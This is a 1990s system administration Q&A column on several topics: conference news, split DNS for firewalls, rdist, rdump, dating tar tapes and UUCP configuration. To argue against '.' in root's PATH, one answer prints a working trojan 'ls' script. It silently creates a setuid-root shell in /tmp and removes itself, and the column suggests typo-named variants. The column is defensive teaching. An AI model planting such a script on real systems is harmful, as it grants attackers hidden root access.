Questions and Answers
Bjorn Satdeva
UniForum in March
UniForum, the oldest, and probably the largest exhibition
dedicated
to UNIX software and hardware will take place in Moscone
Center in
San Francisco, March 21-25. As part of the proceedings,
USENIX and
SAGE are sponsoring a miniconference on UNIX system
administration.
SANS III Conference
The SANS III conference will take place April 4-8, 1994
at the Stouffers
Concourse Hotel in Arlington, Virginia, just across
the Potomac River
from Washington, D.C.
SANS is the acronym for World Conference on System Administration,
Networking, and Security. It differs from the LISA conferences
in
that it focuses specifically on UNIX system administration
in the
business world.
This year, SANS will offer a forum on useful tools and
management
practices, in addition to providing an opportunity for
administrators
to share ideas and experiences with peers in other parts
of the industry.
A New Local System Administration Group
Yet another local system administration user group has
been formed,
this one in New Jersey. The new group, called $GROUPNAME,
is intended
to facilitate the exchange of information pertaining
to the field
of UNIX system administration. $GROUPNAME is not affiliated
with a
particular hardware or software vendor or company. Membership
is free,
and meetings are usually the fourth Thursday of the
month, every other
month at different sites around the state. For more
information, send
"get groupname calendar" as the first line
of an email message
(the Subject: will be ignored) to majordomo@warren.mentorg.com.
So far, speakers have discussed Majordomo, perl, and
system security.
Everyone is invited! By the way, the $GROUPNAME people
claim that
rumor has it that UNIX was invented in New Jersey.
And now to this month's questions:
I have been trying to convince other admins here, but
without much success, that for security reasons, the
current directory
should not be first in the search path. What is your
opinion?
The current directory should not be anywhere in
the search path of a user who has root privileges (or
could obtain
them). The reason is that it is very easy to create
a trojan horse
and thereby trick the user to unknowingly breaching
the system's security.
To convince yourself and your peer admins, create an
executable file
named ls in your home directory with the following content:
#! /bin/sh
echo intruder alert
Now, when a user who has the current directory first
in the search path executes an ls in that directory,
the message
"intruder alert" will diplay. While the above
is rather harmless,
a trojan horse like the following is definitively not:
#! /bin/sh
if [ `whoami` = 'root' ] ; then
rm $0
(cp /bin/sh /tmp/sh; chmod 4555 /tmp/sh; chown root /tmp/sh)&
fi
/bin/ls $*
This code not only creates a super-user backdoor, but
also cleans up after itself, leaving most users unaware
that they
have been caught in a place where they should not be
(the only indication
is that it takes a bit longer than the real ls command
to
execute). While most commercial versions of /bin/sh
have been protected
against this particular tactic, the exercise should
show the problem
clearly. In addition, at least some versions of the
freely distributable
version of sh/csh/ksh are not protected against the
above.
I began by stating that any user who has or can obtain
super-user
privileges should not have the current directory in
his/her search
path at all. If you wonder why, consider how many time
you have made
a typo, such as "sl" when you wanted to type
"ls".
The trojan horse above can also be effective, if its
name is a common
mistyping of a command name, such as sl (ls), tra (tar),
mkae (make),
etc.
The rule of not having current directory first in the
search path
should be applied to any user who has an account on
your system
(a non-privileged user can get away with having current
directory
last, at least most of the time). On a secure system,
the current
directory should not be in any user's search path at
any time. If
you customarily prepend a program in the current directory
with "./"
(dot-slash), you gain the advantage of explicitly controlling
whether
a file is executed in the local directory or via the
$PATH
environment variable.
In addition to the above, many a novice user has innocently
created
a small test program in the home directory, and named
it "test"
-- only to find that many shell scripts no longer worked.
How do I set up the name server on my firewall to give
only minimal information about hosts on my site to the
Internet, while
still being able to connect to all my internal hosts.
I know this
can be done, but I have not been able to figure out
how.
This is really very, very simple! You do not need any
special version of the name server -- you just need
to take advantage
of the existing functionality to create a split name
server. But before
I show you how to do this, let me first explain why
a split name server
can be desirable.
The foremost reason is security, on the grounds that
information about
the internal networks should not be made public unless
absolutely
necessary. The second reason is that if your firewall
is designed
so that the inside hosts are not accessible at all from
the outside,
then there is no reason to advertise their names to
the rest of the
world. In practice, if your firewall is based on filtering
routers,
then the split firewall probably will not buy you anything.
However,
if you have a bastion host, configured with either David
Kobla's Socks
or Marcus Ranum's Firewall Tool Kit, the split name
server makes good
sense.
The split name server consist of (at least) two name
servers. The
external name server lives on the firewall bastion host,
which has
the "public" information (typically only information
about
your firewall machine and a few MX records). The internal
name server,
on the other hand, has information about all the internal
hosts, including
MX records for e-mail delivery and perhaps HINFO and
TXT records
with other relevant information.
In order to make the two name servers play together,
you will need
to configure the resolver on the firewall machine (typically
in either
/etc/resolv.conf or /usr/lib/resolv.conf) to point
to the internal name server and have the internal name
server forward
all inquiries it cannot resolve itself to the name server
on the firewall
machine. You do this through a "forwarders"
statement in the
name server boot file (typically /etc/named.boot). Figure 1
presents a sample boot file for internal name servers.
With this setup, your internal name servers will probably
not be able
to reach any machine outside your local network (this
depends on the
design of your firewall). Instead, they will forward
any inquiry they
receive to the name server on the firewall machine,
which in turn
will obtain the information from the Internet and return
it to the
internal name server. All inquiries from the outside
will be received
by the external name server, which itself contains the
limited information
you decided to make public and therefore cannot be used
to discover
the configuration of your inside network. On the firewall
itself,
any inquiry originating on this machine will be resolved
using the
information in the resolv.conf file, not the local
name server. Processes running on the firewall machine,
such as sendmail,
will therefore be able to learn how to contact machines
on your inside
network.
Several RFCs can provide more information on how to
configure a name
server:
RFC 1032 -- Domain Administration Guide
RFC 1033 -- Domain Administrators Operation Guide
RFC 1034 -- Domain Names -- Concept and Facilities
RFC 974 -- Mail Routing and the Domain Name System
There is also an excellent book on the name server,
Cricket
Liu and Paul Albitz's DNA and BIND from O'Reilly and
Associates
(1992). The book describes in detail many of the methods
and techniques
used under DNS and BIND (although the split name server
described
here is not included).
We use rdist to distribute files between our
systems. However, as the number of files and systems
has grown, it
has become increasingly difficult to keep the rdist.cmd
file
up-to-date in an orderly manner. Do you have any suggestions
for organizing
this?
I sympathize with you. rdist is a very handy
tool, but it is not really scalable to a large site.
Because of the
format of the rdist command file, its complexity can
be measured
as the number of files distributed multiplied by the
number of hosts
receiving files (files * hosts). When you have a low
number
of hosts and files, the complexity is low, and the command
file can
be maintained easily. As the number of files and hosts
increases,
you will see an exponential growth in the complexity
of the rdist
file. Another standard UNIX tool, m4, can help for a
while,
but even with that the system can be difficult to maintain
if you
have a large number of different hardware platforms
or operating system
versions.
I have resolved this problem at several client sites
by writing a
tool named fdist, a frontend to rdist, which addresses
the main problem. fdist splits the file distribution
from
the receiving hosts by using domains similar to e-mail
addresses on
the Internet. The domains used by fdist of course have
nothing
to do with the Internet domains. Instead, they are used
to determine
the various administrative domains within a site. Because
fdist
uses a relatively simple command-line interface, and
because it separates
concerns about files from concerns about hosts, it allows
distribution
information to be handled by less experienced staff
members. A nice
side effect is that configuring new hosts becomes almost
a non-issue.
fdist is described in the LISA V proceeding ("Fdist:
A
Domain-Based File Distribution System for a Heterogeneous
Environment")
and SANS II proceedings (A Tour of Fdist: A Domain-Based
File Distribution
System for a Heterogeneous Environment"). Both
of these papers
are also available by anonymous ftp from ftp.sysadmin.com,
together with the perl sources for fdist.
Is it possible to use rdump for a remote backup
without enabling root access between the local and the
remote system?
On most current versions of UNIX, the devices files
for
disks and tape drives are owned by a user other than
root (typically
a user named "operator," with UID 5). If you
set this user
up on the tape host so that it will accept connections
from the hosts
you want to back-up, you can achieve what you want by
performing all
backups as user operator. It is important that you make
sure that
the environment is correct, especially that the search
path is correct.
A simple way to check the access permission is to type
the command
rsh <<remotehost>> echo hallo
If you get the response "hallo," you can connect
over the network. To verify that the environment is
correct, type
rsh <<remotehost>> env
which should return the environment. If you get an error
message from rdump, along the lines of "Protocol
to remote
tape server botched (code rmt: Command not found. ?),
"your remote
search path is not correct.
We have a number of unlabeled tar tapes. Is there
any way we can determine when the tapes were written?
Not directly. However, if you make a verbose listing
of the content, you can determine the date of the newest
file on the
tape. I hacked up a small shell script (shown in Listing
1), which
sorts the table of contents in the order of last modification
time
of each file. If you do something like
tar -tvf /dev/tape | ./script | tail
you will have a good approximation of when the tape
was
made. This script is a good example of how simple tools
can easily
be hacked together using either the shell or a programming
language
such as perl.
I attended LISA VII, and was disturbed by one of the
papers, which described a site where the users have
root and the admins
do not. What is your opinion of this approach?
The paper in question is Laura deLeon's "Our Users
Have Root," and it is noteworthy, because it describes
an alternative
system administration environment, where users have
the root password
for their workstations, but the system administrators
do not. The
setting for this is a research environment, where it
seems to work
very well.
I agree with you that it is a bit worrisome to think
of such an environment,
and this was definitely one of the more controversial
papers from
the conference. On the other hand, because it works
in that particular
environment, I think it is worthwhile to look into how
Laura organized
this site. There is a lot to be said for giving users
the freedom
to configure their own environment, and while this paper
may have
gone a bit too far for most sites, it nonetheless presented
some basic
approaches which I think can be adapted to other sites.
This is a
definitive must-read for the service-minded system administrator.
My system connects to several other systems using UUCP.
What should my USERFILE look like?
The syntax of the USEFILE is clear, but the semantics
are not. The only content of the USERFILE I can recommend
is
, /usr/spool/uucppublic
, /usr/spool/uucppublic
This will permit both incoming and outgoing traffic
to
access /.usr/spool/uucppublic, independent of where
the traffic
originates. This configuration of USERFILE means your
local
users will need to copy files to that directory before
they can UUCP
them to a remote site, but it also ensures that nobody
from a remote
site can access files not already in uucppublic.
I know your manual shows how you can get a more fine-grained
control,
but because the semantics are so unclear and vary from
one implementation
to another, this approach is the only way to make sure
you have a
secure environment. Luckily, the more modern HoneyDanBer
UUCP has
a completely different, and much clearer, UUCP implementation.
Unfortunately,
at least one of the new re-implememtations of UUCP mimicks
the old
version 7 UUCP with the USERFILE.
About the Author
Bjorn Satdeva is the president of /sys/admin, inc.,
a consulting
firm which specializes in large installation system
administration.
Bjorn is also president and co-founder of Bay-LISA,
a San Francisco
Bay Area user's group for system administrators of large
sites. Bjorn
can be contacted at /sys/admin, inc., 2787 Moorpark
Ave., San Jose,
CA 95128; electronically at bjorn@sysadmin.com; or by
phone
at (408) 241-3111.
|